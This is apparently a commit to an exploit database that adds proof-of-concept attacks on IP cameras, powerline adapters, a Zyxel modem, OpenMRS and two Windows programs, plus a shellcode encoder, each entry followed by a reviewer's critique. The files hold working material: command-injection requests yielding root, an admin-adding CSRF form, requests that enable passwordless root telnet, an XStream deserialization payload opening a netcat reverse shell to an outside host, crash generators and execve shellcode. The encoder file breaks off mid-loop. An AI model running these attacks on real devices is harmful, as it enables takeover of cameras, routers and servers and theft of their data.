DB: 2019-02-06

11 changes to exploits/shellcodes

Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)
River Past Audio Converter 7.7.16 - Denial of Service (PoC)
ResourceSpace 8.6 - 'watched_searches.php' SQL Injection
SuiteCRM 7.10.7 - 'parentTab' SQL Injection
SuiteCRM 7.10.7 - 'record' SQL Injection
ResourceSpace 8.6 - 'watched_searches.php' SQL Injection
SuiteCRM 7.10.7 - 'parentTab' SQL Injection
SuiteCRM 7.10.7 - 'record' SQL Injection
BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure
BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)
BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution
BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure
devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery
devolo dLAN 550 duo+ Starter Kit - Remote Code Execution
Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery
OpenMRS Platform < 2.24.0 - Insecure Object Deserialization

Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)
Offensive Security 2019-02-06 05:01:42 +00:00
parent 298b95e694
commit d667cf901c
13 changed files with 628 additions and 3 deletions


@ -0,0 +1,37 @@
BEWARD N100 H.264 VGA IP Camera M2.1.6 Unauthenticated RTSP Stream Disclosure
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: BEWARD N100 camera suffers from an unauthenticated and unauthorized
live RTSP video stream access.
Tested on: Boa/0.94.14rc21
Farady ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5509
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5509.php
26.01.2019
--
http://TARGET/cgi-bin/view/image
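Review bot: The reproduction section (the single line after `--`) gives only an HTTP path, `http://TARGET/cgi-bin/view/image`, while the title and Desc describe an unauthenticated RTSP stream; state which service actually lacks authentication (the HTTP snapshot endpoint, the RTSP service, or both) and on which port, because an operator deciding what to firewall, or verifying a firmware update, cannot tell from this text. Minor: `Farady` in the Tested-on line should be `Faraday`, the spelling the device's own `/etc/issue` uses in the sibling file-disclosure advisory.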


@ -0,0 +1,51 @@
BEWARD N100 H.264 VGA IP Camera M2.1.6 CSRF Add Admin Exploit
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certai actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Boa/0.94.14rc21
Farady ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5510
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5510.php
26.01.2019
--
<html>
<body>
<form action="http://TARGET/cgi-bin/admin/param">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="group" value="General.UserID" />
<input type="hidden" name="template" value="UserID" />
<input type="hidden" name="General.UserID.U.User" value="dGVzdDp0ZXN0MTIz,01000001" />
<input type="submit" value="Send" />
</form>
</body>
</html>
Base64(test:test123) + ,01000001 for A (Admin) = dGVzdDp0ZXN0MTIz,01000001
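Review bot: The `<form>` in the PoC has no `method` attribute, so it submits as GET; the advisory should say explicitly that `/cgi-bin/admin/param` accepts a state-changing `action=add` over GET, since that is the property that makes the one-click CSRF possible and the property a fix has to remove (require POST with an anti-CSRF token, or a SameSite session cookie, and reject requests whose Origin is not the device). Typo in the Desc: `certai` should read `certain`.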


@ -0,0 +1,67 @@
BEWARD N100 H.264 VGA IP Camera M2.1.6 Root Remote Code Execution
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: The camera suffers from two authenticated command injection vulnerabilities.
The issues can be triggered when calling ServerName or TimeZone GET parameters
via the servertest page. This can be exploited to inject arbitrary system commands
and gain root remote code execution.
Tested on: Boa/0.94.14rc21
Farady ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5512
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5512.php
26.01.2019
--
---------------------------
TimeZone command injection:
root@ground:~# curl -X $'GET' -H $'Authorization: Basic YWRtaW46YWRtaW4=' $'http://TARGET/cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org&TimeZone=03:00|id||'
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2012 10:15:53 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
Content-type: text/plain
ntp update
0 OK
-----------------------------
ServerName command injection:
root@ground:~# curl -X $'GET' -H $'Authorization: Basic YWRtaW46YWRtaW4=' $'http://TARGET/cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org|id||&TimeZone=03:00'
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2012 10:22:11 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
Content-type: text/plain
ntp update
0 OK
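Review bot: The Desc says the injection is reached via the `servertest` page, but both curl commands request `/cgi-bin/operator/servetest`; one of the two is wrong, and anyone writing a log-based detection or a vendor patch note will key on the exact path, so make them agree. `-X $'GET'` is redundant for curl. One sentence on the captured responses would also help: the `uid=0(root)` line appears between the `Connection:` and `Content-type:` headers, i.e. the injected command's output reaches the socket before the CGI writes its own headers, which is why the proof shows up inside an otherwise normal 200 response.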


@ -0,0 +1,80 @@
BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: The camera suffers from an authenticated file disclosure vulnerability.
Input passed via the 'READ.filePath' parameter in fileread script is not properly
verified before being used to read files. This can be exploited to disclose
the contents of arbitrary files via absolute path or via the SendCGICMD API.
Tested on: Boa/0.94.14rc21
Farady ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5511
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php
26.01.2019
--
From the term:
--
root@ground:~# curl -H "Authorization: Basic YWRtaW46YWRtaW4=" http://TARGET/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
--
From the web console:
--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/passwd")
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/issue")
--
Welcome to \n (\m-\s-\r@\l/\b)
Faraday ARM Linux 2.6
Copyright (C) 2005 Faraday Corp. <www.faraday.com.tw>
Released under GNU GPL
--
wr: /usr/share/www/html
sp: /var/www/secret.passwd
bc: /etc/boa.conf
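Review bot: The three trailing lines `wr:`, `sp:` and `bc:` are unexplained abbreviations (presumably web root, secret password file and Boa config path); spell them out or drop them, otherwise the file ends on notes only the author can read. The `/etc/issue` output in this same file spells the platform `Faraday ARM Linux 2.6`, so `Farady ARM Linux 2.6` in the Tested-on line is a typo (it recurs in the other three BEWARD advisories).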


@ -0,0 +1,41 @@
devolo dLAN 550 duo+ Starter Kit Cross-Site Request Forgery
Vendor: devolo AG
Product web page: https://www.devolo.com
Affected version: dLAN 500 AV Wireless+ 3.1.0-1 (i386)
Summary: Devolo dLAN® 550 duo+ Starter Kit is Powerlineadapter which is
a cost-effective and helpful networking alternative for any location
without structured network wiring. Especially in buildings or residences
lacking network cables or where updating the wiring would be expensive
and complicated, Powerline adapters provide networking at high transmission
rates.
Desc: The web application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. The
devolo web application uses predictable URL/form actions in a repeatable way.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.31
Vulnerability discovered by Stefan Petrushevski aka sm
@zeroscience
Advisory ID: ZSL-2019-5507
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5507.php
04.10.2017
--
curl -i -s -k -X 'POST' \
-H 'Origin: http://DEVOLO-IP' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Referer: http://DEVOLO-IP/cgi-bin/htmlmgr?_file=%2Fwgl%2Fmain.wgl&_sid=&_style=std&_lang=&_dir=expert&_page=time' \
--data-binary $'%3Asys%3ANTPClient.EnableNTP=on&%3Asys%3ANTPClient.NTPServer=waddup.com&%3Asys%3ANTPClient.GMTOffset=%2B01%3A00&%3Asys%3ANTPClient.AutoDaylightSaving=on&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=expert&_page=time&_idx=&_sid=&_csrf=' \
'http://DEVOLO-IP/cgi-bin/htmlmgr'
Even though there is a '_csrf' parameter that is being submited, it is never checked (nor it contains any value)
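Review bot: The curl PoC sends `Origin: http://DEVOLO-IP` and a `Referer` on the device's own origin, so it does not demonstrate the cross-site case: a request forged from another site carries that site's Origin, and a device that compared Origin against its own host would block it while still accepting this curl. To support the CSRF claim, either show the request succeeding with a foreign Origin or state explicitly that Origin/Referer are not checked. Typos in the closing line: `submited` should be `submitted`, and `nor it contains any value` should read `nor does it contain any value`.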


@ -0,0 +1,86 @@
devolo dLAN 550 duo+ Starter Kit Remote Code Execution
Vendor: devolo AG
Product web page: https://www.devolo.com
Affected version: dLAN 500 AV Wireless+ 3.1.0-1 (i386)
Summary: Devolo dLAN® 550 duo+ Starter Kit is Powerlineadapter which is
a cost-effective and helpful networking alternative for any location
without structured network wiring. Especially in buildings or residences
lacking network cables or where updating the wiring would be expensive
and complicated, Powerline adapters provide networking at high transmission
rates.
Desc: The devolo firmware has what seems to be a 'hidden' services which
can be enabled by authenticated attacker via the the htmlmgr CGI script.
This allows the attacker to start services that are deprecated or discontinued
and achieve remote arbitrary code execution with root privileges.
Tested on: Linux 2.6.31
Vulnerability discovered by Stefan Petrushevski aka sm
@zeroscience
Advisory ID: ZSL-2019-5508
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php
04.10.2017
--
The htmlmgr cgi script that is accessible via web, does not validate or sanitize
the configuration parameters that a user wants to change. This allows an attacker
to change configuration parametersincluding parameters that are not even shown in
the web administration panel.
One service that is possible for an attacker to enable is telnet and remote maintenance
shell service and then proceed to login in with the 'root' user which doesn't have a password.
In order for an attacker to achieve this, he would need to change the following two values:
System.Baptization.Telnetd <- to enable telnet
System.Baptization.shell <- to enable remote maintenance shell
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Baptization.Telnetd=1&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Baptization.shell=1&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
Since the configuration is read from a file on boot time, an attacker would also
need to somehow make the device to restart. This can be done by issuing the 'reboot'
command again from the html cgi script: System.Reboot
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Reboot=OLACANYOUREBOOT&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
After the reboot the devolo device will have a telnet service on TCP port 23 opened
and an attacker can now login to the device with user 'root' and no password.
--------
Trying DEVOLO-IP...
Connected to DEVOLO-IP.
Escape character is '^]'.
dlanwireless login: root
# whoami
root
#
--------
The attacker then has complete access over the device. t00t.
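Review bot: The three raw requests (the blocks between `--------` rules) omit the `Content-Type: application/x-www-form-urlencoded` header and the blank line that separates headers from body, so they are not valid HTTP/1.1 as written; either show complete requests or present the changed parameters as a list, as the sibling CSRF advisory does with curl. The `System.Reboot=OLACANYOUREBOOT` value implies the parameter's value is ignored; say so rather than leaving the reader to infer it. Prose fixes: `the the htmlmgr`, `parametersincluding` (missing space), `a 'hidden' services` should be `service`, and `login in with` should be `log in with`.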


@ -0,0 +1,19 @@
# Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit
# Version: Zyxel VMG3312-B10B
# Tested on : Parrot Os
# Author: Yusuf Furkan
# Twitter: h1_yusuf
# CVE: CVE-2019-7391
# model name: DSL-491HNU-B1B v2
<html>
<!-- CSRF PoC - generated by Yusuf -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/login/login-page.cgi" method="POST">
<input type="hidden" name="AuthName" value="admin" />
<input type="hidden" name="AuthPassword" value="1234" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
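Review bot: The header's `Version:` field repeats the model name (`Zyxel VMG3312-B10B`) rather than a firmware version, and the file never states what the forged request achieves: the form posts the fixed credentials `admin` / `1234` to `/login/login-page.cgi`, i.e. this is a login CSRF that only works where the default password is still set. That is the detail an operator needs to judge exposure, and it makes "change the default credential" a mitigation worth listing alongside CSRF protection on the login form. `Tested on : Parrot Os` describes the attacker's machine, not the device firmware, so it belongs under a different field.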


@ -0,0 +1,102 @@
Insecure Object Deserialization on the OpenMRS Platform
Vulnerability Details
CVE ID: CVE-2018-19276
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-502
CVSS Base Score: 10.0
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
JAVA 8 ENVIRONMENT
By injecting an XML payload in the following body request to the REST API provided by the application, an attacker could execute arbitrary commands on the remote system. The request below could be used to exploit the vulnerability:
POST /openmrs/ws/rest/v1/xxxxxx HTTP/1.1
Host: HOST
Content-Type: text/xml
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/bin/sh</string>
<string>-c</string>
<string>nc -e /bin/sh 172.16.32.3 8000</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
The payload above was generated with the marshalsec tool and adapted to use multiple arguments because the original payload would not work well if the attacker need to send several arguments to a Linux host.. After the payload was sent, the handler successfully received a response:
~ » nc -vlp 8000
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 5DE4 9A26 3868 367D 8104 B043 CE14 BAD6 5CC9 DE51
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
Ncat: Connection from 172.16.32.2.
Ncat: Connection from 172.16.32.2:52434.
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/local/tomcat
The response should contain an error message similar to the one below:
{"error":{"message":"[Could not read [class org.openmrs.module.webservices.rest.SimpleObject]; nested exception is org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling exception; nested exception is com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service
…omitted for brevity…
The response above showed that the REST Web Services module was unable to process the request properly. However, the payload was deserialized before it is caught by the exception handler, which allowed the team to gain shell access.
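Review bot: The CVSS vector `CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N` (Integrity: None, Availability: None) contradicts the write-up, which demonstrates arbitrary command execution as `uid=0(root)` in the Tomcat container; a root shell is I:H/A:H, and the vector as given does not compute to the stated base score of 10.0. `JAVA 8 ENVIRONMENT` is an unexplained heading (presumably the gadget chain depends on the `jdk.nashorn.internal` and `com.sun.xml.internal` classes being present, which ties the PoC to Java 8); say so. The closing observation, that the `UnmarshallingFailureException` is thrown only after the payload has already been deserialized, is the key detection point and deserves to be stated up front: that exception in the REST Web Services log is the observable artifact even when the request "fails". Minor: `the attacker need to send` should be `needs to send`, and the sentence ends with a double period.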

exploits/windows/dos/46321.py Executable file

@ -0,0 +1,20 @@
#Exploit Title: Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-04
#Tested Version: 8.10.00.8925
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: Device_Monitoring_Studio_8.10.00.8925.py
#2.- Open code.txt and copy content to clipboard
#3.- Open Device Monitoring Studio
#4.- Select "Tools" > "Connect to New Server"
#5.- Select "Enter the name server or address" and Paste Clipboard
#6.- Select "Ok"
#7.- Crashed
cod = "\x41" * 1000
f = open('code.txt', 'w')
f.write(cod)
f.close()
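Review bot: Step 1 names the script `Device_Monitoring_Studio_8.10.00.8925.py` but the file is committed as `46321.py`, and step 7 (`Crashed`) records nothing about the failure (exception type, faulting module, whether the process merely exits), so the report cannot be told apart from a benign input-length limit; the header also lacks the Vendor Homepage / Software Link fields that the sibling `46322.py` carries. The code itself is fine; `with open('code.txt', 'w') as f: f.write(cod)` is the idiomatic form of the three file lines.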

exploits/windows/dos/46322.py Executable file

@ -0,0 +1,28 @@
# Exploit Title: River_Past_Audio_Converter(DoS)
# Date: 05.02.2019
# Vendor Homepage:www.riverpast.com
# Software Link :https://en.softonic.com/download/river-past-audio-converter/windows/post-download?sl=3D1
# Exploit Author: Achilles
# Tested Version: 7.7.16
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:=20
# 1.- Run python code : River_Past_Audio_Converter.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open River_PastAudio_Converter.exe
# 4.- Paste the content of EVIL.txt into the field: 'E-Mail and Activation Code'
# 5.- Click 'Activate' and you will see a crash.
#!/usr/bin/env python
buffer =3D "\x41" * 3000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
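Review bot: The file carries quoted-printable residue from being pasted out of an e-mail: `buffer =3D "\x41" * 3000` (should be `buffer = "\x41" * 3000`) is a syntax error and `Crash:=20` should be `Crash:`, so the script will not run as committed. The `#!/usr/bin/env python` shebang sits below the comment block and is therefore ignored; it has to be line 1. The steps say `EVIL.txt` while the code writes `Evil.txt`, and the bare `except:` hides the real error; `except IOError as e: print e` would tell the user what went wrong.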


@ -6296,6 +6296,8 @@ id,file,description,date,author,type,platform,port
46312,exploits/windows/dos/46312.py,"River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46313,exploits/windows/dos/46313.py,"SpotAuditor 3.6.7 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46314,exploits/windows/dos/46314.py,"TaskInfo 8.2.0.280 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows,
46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -40779,8 +40781,16 @@ id,file,description,date,author,type,platform,port
46282,exploits/php/webapps/46282.txt,"Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection",2019-01-30,"Mehmet EMIROGLU",webapps,php,80
46305,exploits/windows/webapps/46305.txt,"SureMDM < 2018-11 Patch - Local / Remote File Inclusion",2019-02-01,"Digital Interruption",webapps,windows,80
40053,exploits/php/webapps/40053.py,"Tiki Wiki 15.1 - File Upload",2016-07-07,"Ivan Ivanovic",webapps,php,80
46308,exploits/php/webapps/46308.txt,"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection",2019-02-04,dd_,webapps,php,
46310,exploits/php/webapps/46310.txt,"SuiteCRM 7.10.7 - 'parentTab' SQL Injection",2019-02-04,"Mehmet EMIROGLU",webapps,php,
46311,exploits/php/webapps/46311.txt,"SuiteCRM 7.10.7 - 'record' SQL Injection",2019-02-04,"Mehmet EMIROGLU",webapps,php,
46308,exploits/php/webapps/46308.txt,"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection",2019-02-04,dd_,webapps,php,80
46310,exploits/php/webapps/46310.txt,"SuiteCRM 7.10.7 - 'parentTab' SQL Injection",2019-02-04,"Mehmet EMIROGLU",webapps,php,80
46311,exploits/php/webapps/46311.txt,"SuiteCRM 7.10.7 - 'record' SQL Injection",2019-02-04,"Mehmet EMIROGLU",webapps,php,80
46315,exploits/multiple/webapps/46315.txt,"Nessus 8.2.1 - Cross-Site Scripting",2019-02-04,"Ozer Goker",webapps,multiple,
46316,exploits/multiple/webapps/46316.txt,"pfSense 2.4.4-p1 - Cross-Site Scripting",2019-02-04,"Ozer Goker",webapps,multiple,
46317,exploits/hardware/webapps/46317.txt,"BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure",2019-02-05,LiquidWorm,webapps,hardware,
46318,exploits/hardware/webapps/46318.html,"BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)",2019-02-05,LiquidWorm,webapps,hardware,80
46319,exploits/hardware/webapps/46319.txt,"BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution",2019-02-05,LiquidWorm,webapps,hardware,80
46320,exploits/hardware/webapps/46320.txt,"BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure",2019-02-05,LiquidWorm,webapps,hardware,80
46324,exploits/hardware/webapps/46324.txt,"devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery",2019-02-05,sm,webapps,hardware,80
46325,exploits/hardware/webapps/46325.txt,"devolo dLAN 550 duo+ Starter Kit - Remote Code Execution",2019-02-05,sm,webapps,hardware,
46326,exploits/hardware/webapps/46326.html,"Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery",2019-02-05,"Yusuf Furkan",webapps,hardware,80
46327,exploits/java/webapps/46327.txt,"OpenMRS Platform < 2.24.0 - Insecure Object Deserialization",2019-02-05,"Bishop Fox",webapps,java,
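Review bot: The port column is inconsistent within this hunk: `46308`, `46310` and `46311` appear both with an empty port and with `80` (the add/remove markers are lost in this rendering, but the later copies carry `80`, so these rows are being corrected), while the newly added `46317`, `46325` and `46327` leave the port empty even though their sibling web-application entries (`46318` to `46320`, `46324`, `46326`) carry `80`. Either fill in `80` for the new web entries too or note why the field is empty, otherwise a follow-up fix-up like the one for the three corrected rows will be needed.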


@ -939,3 +939,4 @@ id,file,description,date,author,type,platform
46264,shellcodes/arm/46264.s,"Linux/ARM - Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)",2019-01-28,"Gokul Babu",shellcode,arm
46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86
46302,shellcodes/linux_x86/46302.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)",2019-02-01,Kiewicz,shellcode,linux_x86
46323,shellcodes/linux_x86/46323.py,"Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)",2019-02-05,"Aditya Chaudhary",shellcode,linux_x86

shellcodes/linux_x86/46323.py Executable file

@ -0,0 +1,83 @@
#!/usr/bin/python
# Python Random Insertion Encoder
# Author: Aditya Chaudhary
# Date: 5th Feb 2019
import random
import sys
import argparse
shellcode = ("\x31\xc0\x50\x89\xe2\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
# Parse Arguments
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--entropy", help="Entropy of random byted to be inserted after each shellcode byte (use a value between 1 & 10)", type=int)
parser.add_argument("-b", "--badchars", help="Badchars to removed from inserted bytes", type=str)
args = parser.parse_args()
encoded = ""
encoded2 = ""
entropy = args.entropy
bad_chars = args.badchars
#print len(sys.argv)
#if len(sys.argv) > 1:
# entropy = int(sys.argv[1])
print '[#] Using Entropy: %s (inserting 1 to %s random number of bytes)'%(entropy, entropy)
#if len(sys.argv) < 3:
# print '[#] No Bad characters provided'
#else:
# bad_chars = str(sys.argv[2])
bad_chars = bad_chars.split(',')
print '[#] Bad chars: %s'%(bad_chars)
# Generate byte string from \x01 to \xff
chars = []
for o in range(256):
#print(hex(o))
ch = '%02x' % o
if ch not in bad_chars:
chars.append(ch)
print '[#] Generating Shellcode...'
repeat = 0
for x in bytearray(shellcode) :
repeat = random.randint(1, entropy)
#print "[#]"+str(repeat)
encoded += '\\x'
encoded += '%02x' % x
encoded += '\\x'
encoded += '%02x'% repeat
encoded2 += '0x'
encoded2 += '%02x,' % x
encoded2 += '0x'
encoded2 += '%02x,' % repeat
en_byte = ""
for i in range(1, repeat+1):
# print i
en_byte = chars[random.randint(0, len(chars)-1)]
encoded += '\\x%s' % en_byte
